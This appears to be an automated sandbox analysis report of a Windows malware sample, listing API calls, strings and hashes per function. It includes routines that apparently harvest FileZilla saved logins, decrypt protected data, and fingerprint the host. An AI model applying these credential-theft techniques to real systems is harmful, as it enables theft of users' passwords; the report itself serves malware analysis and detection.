Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
FindClose.KERNEL32(000000FF), ref: 0040D500

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 8ca7a1081a3183d5f3e78e003e506f60ba6fc5323407f3e5e8770ee78b196e29
Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
Opcode Fuzzy Hash: 8ca7a1081a3183d5f3e78e003e506f60ba6fc5323407f3e5e8770ee78b196e29
Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00414570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
LocalFree.KERNEL32(00000000), ref: 004146DF

Strings

/ , xrefs: 0041463C

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: bd951ed3ca41de19a59e384374789be5e0ff2bd07393f72555197dc2eaeec2a1
Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
Opcode Fuzzy Hash: bd951ed3ca41de19a59e384374789be5e0ff2bd07393f72555197dc2eaeec2a1
Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB60 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306

Strings

\*.*, xrefs: 0040DB7D

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 2b3e849318f8b253a2cdf89d748c6f1cb1b4c0b6f2b72e1768814fbe14752514
Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
Opcode Fuzzy Hash: 2b3e849318f8b253a2cdf89d748c6f1cb1b4c0b6f2b72e1768814fbe14752514
Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8

Uniqueness

Uniqueness Score: -1.00%

Function 004155A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Strings

>N@, xrefs: 004155B8, 00415614, 004155BB, 00415617

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID: >N@
API String ID: 80407269-3381801619
Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415D00 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
CloseHandle.KERNEL32(0041D599), ref: 00415D7A

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004144B0 Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,04286D18,00000000,?,0041D758,00000000,?,00000000,00000000,?,042874B8,00000000), ref: 004144C0
HeapAlloc.KERNEL32(00000000), ref: 004144C7
GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
wsprintfA.USER32 ref: 00414514

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97

Uniqueness

Uniqueness Score: -1.00%

Function 00409540 Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
LocalFree.KERNEL32(?), ref: 004095AF

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004143C0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00401177,042808A8,004136EB,0041D6E3), ref: 004143CD
HeapAlloc.KERNEL32(00000000), ref: 004143D4
GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91

Uniqueness

Uniqueness Score: -1.00%

Function 00401120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
ExitProcess.KERNEL32 ref: 0040113E

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65

Uniqueness

Uniqueness Score: -1.00%

Function 004070E0 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00413068,?), ref: 004070F4
RtlAllocateHeap.NTDLL(00000000,?,00413068,?), ref: 004070FB
lstrcat.KERNEL32(?,04283B58), ref: 004072AB
lstrcat.KERNEL32(?,?), ref: 004072BF
lstrcat.KERNEL32(?,?), ref: 004072D3
lstrcat.KERNEL32(?,?), ref: 004072E7
lstrcat.KERNEL32(?,042866B8), ref: 004072FB
lstrcat.KERNEL32(?,04286760), ref: 0040730F
lstrcat.KERNEL32(?,04288788), ref: 00407322
lstrcat.KERNEL32(?,04288710), ref: 00407336
lstrcat.KERNEL32(?,04283BE0), ref: 0040734A
lstrcat.KERNEL32(?,?), ref: 0040735E
lstrcat.KERNEL32(?,?), ref: 00407372
lstrcat.KERNEL32(?,?), ref: 00407386
lstrcat.KERNEL32(?,042866B8), ref: 00407399
lstrcat.KERNEL32(?,04286760), ref: 004073AD
lstrcat.KERNEL32(?,04288788), ref: 004073C1
lstrcat.KERNEL32(?,04288710), ref: 004073D4
lstrcat.KERNEL32(?,042881F8), ref: 004073E8
lstrcat.KERNEL32(?,?), ref: 004073FC
lstrcat.KERNEL32(?,?), ref: 00407410
lstrcat.KERNEL32(?,?), ref: 00407424
lstrcat.KERNEL32(?,042866B8), ref: 00407438
lstrcat.KERNEL32(?,04286760), ref: 0040744B
lstrcat.KERNEL32(?,04288788), ref: 0040745F
lstrcat.KERNEL32(?,04288710), ref: 00407473
lstrcat.KERNEL32(?,04288260), ref: 00407486
lstrcat.KERNEL32(?,?), ref: 0040749A
lstrcat.KERNEL32(?,?), ref: 004074AE
lstrcat.KERNEL32(?,?), ref: 004074C2
lstrcat.KERNEL32(?,042866B8), ref: 004074D6
lstrcat.KERNEL32(?,04286760), ref: 004074EA
lstrcat.KERNEL32(?,04288788), ref: 004074FD
lstrcat.KERNEL32(?,04288710), ref: 00407511
lstrcat.KERNEL32(?,042882C8), ref: 00407525
lstrcat.KERNEL32(?,?), ref: 00407539
lstrcat.KERNEL32(?,?), ref: 0040754D
lstrcat.KERNEL32(?,?), ref: 00407561
lstrcat.KERNEL32(?,042866B8), ref: 00407574
lstrcat.KERNEL32(?,04286760), ref: 00407588
lstrcat.KERNEL32(?,04288788), ref: 0040759C
lstrcat.KERNEL32(?,04288710), ref: 004075AF
lstrcat.KERNEL32(?,04288330), ref: 004075C3
lstrcat.KERNEL32(?,?), ref: 004075D7
lstrcat.KERNEL32(?,?), ref: 004075EB
lstrcat.KERNEL32(?,?), ref: 004075FF
lstrcat.KERNEL32(?,042866B8), ref: 00407613
lstrcat.KERNEL32(?,04286760), ref: 00407626
lstrcat.KERNEL32(?,04288788), ref: 0040763A
lstrcat.KERNEL32(?,04288710), ref: 0040764E

Part of subcall function 00406FA0: lstrcat.KERNEL32(3096B020,0041DEB8), ref: 00406FD6
Part of subcall function 00406FA0: lstrcat.KERNEL32(3096B020,00000000), ref: 00407018
Part of subcall function 00406FA0: lstrcat.KERNEL32(3096B020, : ), ref: 0040702A
Part of subcall function 00406FA0: lstrcat.KERNEL32(3096B020,00000000), ref: 0040705F
Part of subcall function 00406FA0: lstrcat.KERNEL32(3096B020,0041DEC0), ref: 00407070
Part of subcall function 00406FA0: lstrcat.KERNEL32(3096B020,00000000), ref: 004070A3
Part of subcall function 00406FA0: lstrcat.KERNEL32(3096B020,0041DEC4), ref: 004070BD
Part of subcall function 00406FA0: task.LIBCPMTD ref: 004070CB

lstrcat.KERNEL32(?,04280AB8), ref: 004077DB
lstrcat.KERNEL32(?,04287898), ref: 004077EE
lstrlen.KERNEL32(3096B020), ref: 004077FB
lstrlen.KERNEL32(3096B020), ref: 0040780B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04280B98), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
String ID:
API String ID: 3958002797-0
Opcode ID: 1deb68fe007c3a931c0a137675a9dba7412e12439f4df884cae112fa19bd3d59
Instruction ID: 3e78b0701875fb024adfa953bd7607f570b92d72e3b87f8e208063dda3fe5bd2
Opcode Fuzzy Hash: 1deb68fe007c3a931c0a137675a9dba7412e12439f4df884cae112fa19bd3d59
Instruction Fuzzy Hash: D33234B6D01A14ABCB35EBA0DC89DDE737DAB48704F404699B20A66090DF78E7C5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA90 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

strtok_s.MSVCRT ref: 0040EB5B
GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
lstrlen.KERNEL32(00000000), ref: 0040EBD3

Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
lstrlen.KERNEL32(00000000), ref: 0040EC1D
StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
lstrlen.KERNEL32(00000000), ref: 0040EC67
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
lstrlen.KERNEL32(00000000), ref: 0040ECB5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
lstrcat.KERNEL32(?,login: ), ref: 0040EE13
lstrcat.KERNEL32(?,00000000), ref: 0040EE26
lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
lstrcat.KERNEL32(?,password: ), ref: 0040EE44
lstrcat.KERNEL32(?,00000000), ref: 0040EE57
lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
strtok_s.MSVCRT ref: 0040EEB9
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
memset.MSVCRT ref: 0040EF17

Strings

<Port>, xrefs: 0040EC06
<User>, xrefs: 0040EC50
<Host>, xrefs: 0040EBBC
login: , xrefs: 0040EE0A
password: , xrefs: 0040EE3B
profile: null, xrefs: 0040EDA8
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040EAE4
<Pass encoding="base64">, xrefs: 0040EC9A
browser: FileZilla, xrefs: 0040ED99
url: , xrefs: 0040EDB7

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1266801029-555421843
Opcode ID: c3d49ad425597895e6b73b66ed504d4df8e9fd699888107dec2976afebe1af47
Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
Opcode Fuzzy Hash: c3d49ad425597895e6b73b66ed504d4df8e9fd699888107dec2976afebe1af47
Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00415ED0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,04262958), ref: 00415F11
GetProcAddress.KERNEL32(74DD0000,04262970), ref: 00415F2A
GetProcAddress.KERNEL32(74DD0000,04262988), ref: 00415F42
GetProcAddress.KERNEL32(74DD0000,042629A0), ref: 00415F5A
GetProcAddress.KERNEL32(74DD0000,042628E0), ref: 00415F73
GetProcAddress.KERNEL32(74DD0000,0427DC28), ref: 00415F8B
GetProcAddress.KERNEL32(74DD0000,04264318), ref: 00415FA3
GetProcAddress.KERNEL32(74DD0000,04264518), ref: 00415FBC
GetProcAddress.KERNEL32(74DD0000,04280438), ref: 00415FD4
GetProcAddress.KERNEL32(74DD0000,042805A0), ref: 00415FEC
GetProcAddress.KERNEL32(74DD0000,042803F0), ref: 00416005
GetProcAddress.KERNEL32(74DD0000,04280570), ref: 0041601D
GetProcAddress.KERNEL32(74DD0000,04264478), ref: 00416035
GetProcAddress.KERNEL32(74DD0000,04280588), ref: 0041604E
GetProcAddress.KERNEL32(74DD0000,04280660), ref: 00416066
GetProcAddress.KERNEL32(74DD0000,042645F8), ref: 0041607E
GetProcAddress.KERNEL32(74DD0000,042806C0), ref: 00416097
GetProcAddress.KERNEL32(74DD0000,04280558), ref: 004160AF
GetProcAddress.KERNEL32(74DD0000,042643B8), ref: 004160C7
GetProcAddress.KERNEL32(74DD0000,042805B8), ref: 004160E0
GetProcAddress.KERNEL32(74DD0000,04264338), ref: 004160F8
LoadLibraryA.KERNEL32(04280618,?,004136C0), ref: 0041610A
LoadLibraryA.KERNEL32(04280540,?,004136C0), ref: 0041611B
LoadLibraryA.KERNEL32(042804C8,?,004136C0), ref: 0041612D
LoadLibraryA.KERNEL32(042805D0,?,004136C0), ref: 0041613F
LoadLibraryA.KERNEL32(042804E0,?,004136C0), ref: 00416150
GetProcAddress.KERNEL32(75A70000,04280408), ref: 00416172
GetProcAddress.KERNEL32(75290000,042804F8), ref: 00416193
GetProcAddress.KERNEL32(75290000,04280510), ref: 004161AB
GetProcAddress.KERNEL32(75BD0000,04280630), ref: 004161CD
GetProcAddress.KERNEL32(75450000,04264378), ref: 004161EE
GetProcAddress.KERNEL32(76E90000,0427DC38), ref: 0041620F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00416226

Strings

NtQueryInformationProcess, xrefs: 0041621A

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
